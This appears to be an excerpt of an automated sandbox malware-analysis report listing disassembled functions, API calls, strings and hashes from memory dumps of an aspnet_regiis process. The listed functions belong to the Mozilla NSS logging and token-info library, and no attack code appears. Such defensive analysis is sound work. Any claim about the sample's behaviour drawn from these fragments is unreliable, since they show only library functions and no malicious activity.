PR_GetCurrentThread.NSS3 ref: 6C4D910A

Strings

%u.%u.%u.%u, xrefs: 6C4D8E74

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 91086bafcf520bf0e56abd112065c67b5e20d1fd25072930cb75f380e7625792
Instruction ID: 13da4851e1e773236e08674d98a1e291fc7afec77bb888c943757b68f740192c
Opcode Fuzzy Hash: 91086bafcf520bf0e56abd112065c67b5e20d1fd25072930cb75f380e7625792
Instruction Fuzzy Hash: FE029C31A051618BEB19DF19C474F6ABBB2EF52304F1B825EC8959BB91C732F909C790

Function 6C4568E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C4568FC
PR_EnterMonitor.NSS3 ref: 6C456924

Part of subcall function 6C489090: TlsGetValue.KERNEL32 ref: 6C4890AB
Part of subcall function 6C489090: TlsGetValue.KERNEL32 ref: 6C4890C9
Part of subcall function 6C489090: EnterCriticalSection.KERNEL32 ref: 6C4890E5
Part of subcall function 6C489090: TlsGetValue.KERNEL32 ref: 6C489116
Part of subcall function 6C489090: LeaveCriticalSection.KERNEL32 ref: 6C48913F

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

PR_EnterMonitor.NSS3 ref: 6C45693E
TlsGetValue.KERNEL32 ref: 6C456977
TlsGetValue.KERNEL32 ref: 6C4569B8
PR_ExitMonitor.NSS3 ref: 6C456B1E
PR_ExitMonitor.NSS3 ref: 6C456B39
TlsGetValue.KERNEL32 ref: 6C456B62

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 25e6170a46df5f9b0ee6720897b09a4521c8c599c9bb33a86889c1557fa07fd7
Instruction ID: b8baafbbe2f40c98c9c90fee5275383e5d617fbdd29ab3a72e80a55716c082fd
Opcode Fuzzy Hash: 25e6170a46df5f9b0ee6720897b09a4521c8c599c9bb33a86889c1557fa07fd7
Instruction Fuzzy Hash: 7B916174A58120CBD750DF2DC880D9E7FB2FB83314BA18259C8449FB19C735D9A2CB82

Function 6C3E09A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3E06A0: TlsGetValue.KERNEL32 ref: 6C3E06C2
Part of subcall function 6C3E06A0: EnterCriticalSection.KERNEL32(?), ref: 6C3E06D6
Part of subcall function 6C3E06A0: PR_Unlock.NSS3 ref: 6C3E06EB

memcmp.VCRUNTIME140(00000000,6C3C9B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C3C9B8A,00000000,k-<l), ref: 6C3E09D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C3C9B8A,00000000,k-<l), ref: 6C3E09F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C3C9B8A,00000000,k-<l), ref: 6C3E0A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C3C9B8A,00000000,k-<l), ref: 6C3E0A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C3C9B8A,00000000,k-<l), ref: 6C3E0A48

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 5ba51464b96c0085aa2b486cd1d7c5b2a959e0fe14b9fc82f5061e1f9b6f786e
Instruction ID: b449288823e357b3d5b885e4281f5839d2a081ccbaf14dcccdfa9b7241345ca8
Opcode Fuzzy Hash: 5ba51464b96c0085aa2b486cd1d7c5b2a959e0fe14b9fc82f5061e1f9b6f786e
Instruction Fuzzy Hash: 3A02F2B2E002159FEB009F65DC41BAB77B9FF48318F05012AD945A7B52EB32E905DFA1

Function 6C46C9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6C46CEA5

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: 1c3c1b9601e1559c45d6d7bf85e62a4188cc3a949395a25eb3f885bce1fa0771
Instruction ID: e4811c54f3f210d30fb56df11b4f59831792b434c42c46d00de74fec47c0fde6
Opcode Fuzzy Hash: 1c3c1b9601e1559c45d6d7bf85e62a4188cc3a949395a25eb3f885bce1fa0771
Instruction Fuzzy Hash: 7A718271A057408FC704DF29C844A1ABBF1FF89314F258A2EE4A9C7BA4E730D955CB91

Function 6C4DCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4DD086
PR_Malloc.NSS3(00000001), ref: 6C4DD0B9
PR_Free.NSS3(?), ref: 6C4DD138

Strings

>, xrefs: 6C4DCF5B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 89f82964eef983ca5ac5324caa3b4118c414d305cfe503ca8fcfad6c503142e2
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 81D17B62B405470BEB14F87C8CB1FEA7793C782378F5A0329D1218BBE5E519E8478761

Function 6C47AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c061d7cc4be1053450a631ac451a8d04fda5f31d113874ce561780f4b63b780a
Instruction ID: ae350975ff887eb3a0f7e95b437e32e2b5934498ef201b158024f6d0ea2e7a14
Opcode Fuzzy Hash: c061d7cc4be1053450a631ac451a8d04fda5f31d113874ce561780f4b63b780a
Instruction Fuzzy Hash: 14F1DF71E011568FDB24CF28CD49FAAB7F1AB4A309F164229D905E7F40E7B49941CBE4

Function 6C430E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C431052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C431086

Strings

h(Cl, xrefs: 6C430E55, 6C430EC4, 6C430F3A, 6C430FA7
h(Cl, xrefs: 6C431062, 6C43105D, 6C430F37, 6C431081, 6C431082

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memcpymemset
String ID: h(Cl$h(Cl
API String ID: 1297977491-1110023921
Opcode ID: d7ed0cfa5acf6752892e8ab468df137d6d3afea606d114daeb2e63800b8820b9
Instruction ID: 9d0683916f126bbd09eb95b7ca6ee49ea5924b78a1ccb545f91f6a389dddaeb6
Opcode Fuzzy Hash: d7ed0cfa5acf6752892e8ab468df137d6d3afea606d114daeb2e63800b8820b9
Instruction Fuzzy Hash: 4DA13C71B0125A9FDB08CF9AC890EEEB7B6BF8C314B159129E909A7740D735EC11CB90

Function 6C3B8EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b856cadb2510f9c347c7e37a68935e0b70dc6a951dfae8e6ae9fadd14ea3d794
Instruction ID: 39610a53f520faaf150a07b60a2e61d67bca0d2fa69487ebbc8426893321aac5
Opcode Fuzzy Hash: b856cadb2510f9c347c7e37a68935e0b70dc6a951dfae8e6ae9fadd14ea3d794
Instruction Fuzzy Hash: 3F11BF32A002168FD704DF24E888B5AB3A5BF5231CF05426AE8059FE41D776D886CBD6

Function 6C490C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a6c1da99d20a742013b21c99f50b75bf7a04416fc2241259f52749b46c7546
Instruction ID: af596071c36894d469cba70e06ebadb6fbac6d4988f67981e5904c08b0cddd24
Opcode Fuzzy Hash: 85a6c1da99d20a742013b21c99f50b75bf7a04416fc2241259f52749b46c7546
Instruction Fuzzy Hash: CB11C1747043158FDB04DF18C884E6A7BF2FF89368F148069D8198B701DB71E806CBA1

Function 6C404440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4bbcb2fed914f317b50f37f046e46d61e060271d3be4130ddc3eed5b7fb6f6
Instruction ID: 7d86ca07167e9d6b2795961ee83e3177f07eb892218f3e269bb308ee17f73bf1
Opcode Fuzzy Hash: 4b4bbcb2fed914f317b50f37f046e46d61e060271d3be4130ddc3eed5b7fb6f6
Instruction Fuzzy Hash: 4411C576A002199F9B00DF59C885DEFBBF9EF4C264B16416AED18E7301E630ED118BE1

Function 6C490D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 88aee6b3fe0fb8d3f84b24b4ad7e3042f3272b5d2628ee891c8e02fadaa6f5fa
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 1DE06D3A202064A7DB18CE09C450EA97B59DF8A61AFA4817DCC699BA01D633F9038781

Function 6C4D09D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C4D0A22

Part of subcall function 6C489DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DC6
Part of subcall function 6C489DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DD1
Part of subcall function 6C489DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C489DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C4D0A35

Part of subcall function 6C3B3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3B382A
Part of subcall function 6C3B3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3B3879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C4D0A66
PR_GetCurrentThread.NSS3 ref: 6C4D0A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C4D0A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C4D0AC8
PR_vsmprintf.NSS3(?,?), ref: 6C4D0AE8
EnterCriticalSection.KERNEL32(?), ref: 6C4D0B19
OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0B48
OutputDebugStringA.KERNEL32(?), ref: 6C4D0B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C4D0C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4D0C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6C4D0C76
PR_LogFlush.NSS3 ref: 6C4D0C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C4D0C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0C9C
OutputDebugStringA.KERNEL32(?), ref: 6C4D0CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C4D0CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C4D0D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6C4D0D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C4D0D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6C4D0D90
free.MOZGLUE(00000000), ref: 6C4D0D99

Strings

%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C4D0A5B
%ld[%p]: , xrefs: 6C4D0A96

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 1722140f84cbb50106e3101aaeba93f085699ff6ac3c77cb85758d093998c8f4
Instruction ID: e9f12d0490b9aa25ef16216de6ca75a084efe686fa5d2ed1d36e48521e553194
Opcode Fuzzy Hash: 1722140f84cbb50106e3101aaeba93f085699ff6ac3c77cb85758d093998c8f4
Instruction Fuzzy Hash: 68A1E770A002949FDB10EB28CC5DF9B3BB8AF12318F0A05A8F81597B41D776F984CB55

Function 6C3F28A0 Relevance: 50.9, APIs: 12, Strings: 17, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C3F28BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C3F28EF

Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4D0B88
Part of subcall function 6C4D09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4D0C5D
Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C4D0C8D
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0C9C
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4D0CD1
Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C4D0CEC
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0CFB
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0D16
Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C4D0D26
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0D35
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C4D0D65
Part of subcall function 6C4D09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C4D0D70
Part of subcall function 6C4D09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4D0D90
Part of subcall function 6C4D09D0: free.MOZGLUE(00000000), ref: 6C4D0D99

Part of subcall function 6C3B0F00: PR_GetPageSize.NSS3(6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F1B
Part of subcall function 6C3B0F00: PR_NewLogModule.NSS3(clock,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C3F28D6

Part of subcall function 6C4D09D0: PR_Now.NSS3 ref: 6C4D0A22
Part of subcall function 6C4D09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C4D0A35
Part of subcall function 6C4D09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C4D0A66
Part of subcall function 6C4D09D0: PR_GetCurrentThread.NSS3 ref: 6C4D0A70
Part of subcall function 6C4D09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C4D0A9D
Part of subcall function 6C4D09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C4D0AC8
Part of subcall function 6C4D09D0: PR_vsmprintf.NSS3(?,?), ref: 6C4D0AE8
Part of subcall function 6C4D09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4D0B19
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0B48
Part of subcall function 6C4D09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4D0C76
Part of subcall function 6C4D09D0: PR_LogFlush.NSS3 ref: 6C4D0C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C3F2963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C3F2983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C3F29A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C3F29C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C3F2A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C3F2A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C3F2A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C3F2A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C3F2AB6

Strings

manufacturerID = "%.32s", xrefs: 6C3F297E
hardware version: %d.%d, xrefs: 6C3F2A89
C_GetTokenInfo, xrefs: 6C3F28B8
CKF_WRITE_PROTECTED, xrefs: 6C3F29FE, 6C3F2A1F
CKF_RNG, xrefs: 6C3F2A13, 6C3F2A20
serial = "%.16s", xrefs: 6C3F29BE
maxSessions = %u, Sessions = %u, xrefs: 6C3F2A43
nMl, xrefs: 6C3F290B, 6C3F2937
maxRwSessions = %u, RwSessions = %u, xrefs: 6C3F2A61
CKF_LOGIN_REQUIRED, xrefs: 6C3F29F3, 6C3F2A1E
firmware version: %d.%d, xrefs: 6C3F2AB1
CKF_USER_PIN_INIT, xrefs: 6C3F29E5
model = "%.16s", xrefs: 6C3F299E
label = "%.32s", xrefs: 6C3F295E
pInfo = 0x%p, xrefs: 6C3F28EA
